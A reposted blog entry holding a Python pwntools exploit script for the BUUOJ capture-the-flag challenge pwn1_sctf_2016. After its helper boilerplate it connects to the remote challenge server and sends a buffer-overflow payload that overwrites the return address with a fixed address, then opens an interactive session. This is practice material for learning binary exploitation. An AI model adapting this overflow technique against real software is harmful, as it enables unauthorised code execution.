CTF-Buuoj-Pwn-pwn1_sctf_2016
作者:互联网
#-----------------------------------------------------------------------------------------------
# coding:UTF-8 |
# author:zxcyyyyy000 |
# :) |
#-----------------------------------------------------------------------------------------------
from PwnContext import *
from pwnlib.util.packing import p32
from pwnlib.util.packing import p64
from pwnlib.util.packing import u32
from pwnlib.util.packing import u64
#-----------------------------------------------------------------------------------------------
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=False :ctx.recvuntil(delims, drop)
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, b'\0'))
uu64 = lambda data :u64(data.ljust(8, b'\0'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
irt = lambda :ctx.interactive()
p = lambda :pause()
#-----------------------------------------------------------------------------------------------
Debug = 0
file_name = 'pwn1_sctf_2016'
target_addr = 'node4.buuoj.cn:27253'
libc_name = ''
libc_path = '/home/ubuntu/Tools/libc-database/libs/' + libc_name + '/'
context.log_level = 'DEBUG'
ctx.binary = file_name
if Debug == 0:
elf = ELF(file_name)
if(libc_name != ''):
libc = ELF(libc_path+'libc.so.6')
context.os = elf.os
context.arch = elf.arch
ctx.remote=(str((target_addr.split(':'))[0]),int((target_addr.split(':'))[1]))
ctx.start('remote')
elif Debug == 1:
ctx.custom_lib_dir = libc_path
ctx.debug_remote_libc = True
elf = ELF(file_name)
libc = ELF(libc_path+'libc.so.6')
context.os = elf.os
context.arch = elf.arch
ctx.start()
elif Debug == 2:
elf = ELF(file_name)
ctx.start()
else:
print("Error")
exit(1)
#-----------------------------------------------------------------------------------------------
def Exploit():
sl('I'*21+'a'+p32(0x08048F0D))
irt()
#-----------------------------------------------------------------------------------------------
Exploit()
标签:pwn1,name,libc,ctx,sctf,Buuoj,elf,data,lambda 来源: https://www.cnblogs.com/zxcyyyyy000/p/16454264.html